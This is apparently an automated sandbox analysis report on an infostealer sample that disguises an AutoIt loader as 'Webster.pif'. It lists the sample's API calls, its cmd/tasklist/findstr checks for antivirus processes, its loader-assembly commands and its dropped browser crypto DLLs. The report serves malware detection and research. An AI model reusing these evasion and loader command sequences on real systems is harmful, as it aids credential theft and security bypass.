                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif Code function: 11_2_00AF4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif Code function: 11_2_00AF4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif Code function: 11_2_00B0D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif Code function: 11_2_00AE42D5: CreateFileW,DeviceIoControl,CloseHandle
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif Code function: 11_2_00AD8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif Code function: 11_2_00AE5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif Code function: String function: 00A91A36 appears 34 times
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif Code function: String function: 00AA0D17 appears 70 times
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif Code function: String function: 00AA8B30 appears 42 times
                        Source: C:\Users\user\Desktop\file.exe Code function: String function: 004062A3 appears 58 times
                        Source: file.exe Static PE information: invalid certificate
                        Source: file.exe, 00000000.00000003.2086397836.00000000026CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs file.exe
                        Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: file.exe Static PE information: Section: .reloc ZLIB complexity 1.002685546875
                        Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@22/49@4/2
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif Code function: 11_2_00AEA6AD GetLastError,FormatMessageW
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif Code function: 11_2_00AD8DE9 AdjustTokenPrivileges,CloseHandle
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif Code function: 11_2_00AD9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif Code function: 11_2_00AE4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004024FB CoCreateInstance
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif Code function: 11_2_00AE443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199747278259[1].htm
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\nsg5A30.tmp
                        Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
                        Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                        Source: AAFIDG.11.dr, HDAFII.11.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: file.exe ReversingLabs: Detection: 29%
                        Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
                        Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 229536
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "ReprintVerificationMercyRepository" Elliott
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Exhibit + Rand + Hours 229536\U
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\229536\Webster.pif 229536\Webster.pif 229536\U
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 5
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: wsock32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: napinsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: wshbth.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: winrnr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: mozglue.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: Webster.pif, 0000000B.00000002.3346342228.000000006C8CD000.00000002.00000001.01000000.00000009.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                        Source: Binary string: freebl3.pdb source: Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                        Source: Binary string: freebl3.pdbp source: Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                        Source: Binary string: nss3.pdb@ source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                        Source: Binary string: softokn3.pdb@ source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Webster.pif, 0000000B.00000002.3339217037.000000002B6B6000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Webster.pif, 0000000B.00000002.3334527572.000000001F7DA000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                        Source: Binary string: nss3.pdb source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                        Source: Binary string: mozglue.pdb source: Webster.pif, 0000000B.00000002.3346342228.000000006C8CD000.00000002.00000001.01000000.00000009.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: softokn3.pdb source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                        Source: freebl3.dll.11.drStatic PE information: section name: .00cfg
                        Source: mozglue.dll.11.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.11.drStatic PE information: section name: .didat
                        Source: softokn3.dll.11.drStatic PE information: section name: .00cfg
                        Source: nss3.dll.11.drStatic PE information: section name: .00cfg
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AA8B75 push ecx; ret 11_2_00AA8B88

                        Persistence and Installation Behavior

                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\229536\Webster.pifJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00B059B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_00B059B3
